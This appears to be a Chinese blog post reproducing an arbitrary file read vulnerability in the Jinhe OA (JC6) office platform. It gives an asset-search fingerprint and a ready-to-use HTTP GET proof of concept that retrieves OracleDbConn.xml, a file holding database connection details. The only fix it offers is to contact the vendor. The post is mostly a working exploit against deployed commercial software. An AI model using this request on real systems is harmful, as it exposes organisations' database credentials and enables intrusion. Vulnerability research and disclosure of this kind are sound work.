【漏洞复现】金和OA任意文件读取漏洞

Nx01 产品简介

        金和数字化智能办公平台(简称JC6)是一款结合了人工智能技术的数字化办公平台,为企业带来了智能化的办公体验和全面的数字化转型支持。同时符合国家信创认证标准,支持组织数字化转型,实现业务流程的数字化、智能化和协同化,提高企业竞争力。

Nx02 漏洞描述

       金和OA存在任意文件读取漏洞。攻击者可以读取OracleDbConn.xml文件获取敏感信息。

Nx03 产品主页

        app.name="金和 OA"

【漏洞复现】金和OA任意文件读取漏洞_第1张图片

Nx04 漏洞复现

POC:

GET /c6/JhSoft.Web.Dossier.JG/JhSoft.Web.Dossier.JG/XMLFile/OracleDbConn.xml HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0

【漏洞复现】金和OA任意文件读取漏洞_第2张图片

Nx05 修复建议

        建议联系软件厂商进行处理。

你可能感兴趣的:(【漏洞复现】,web安全)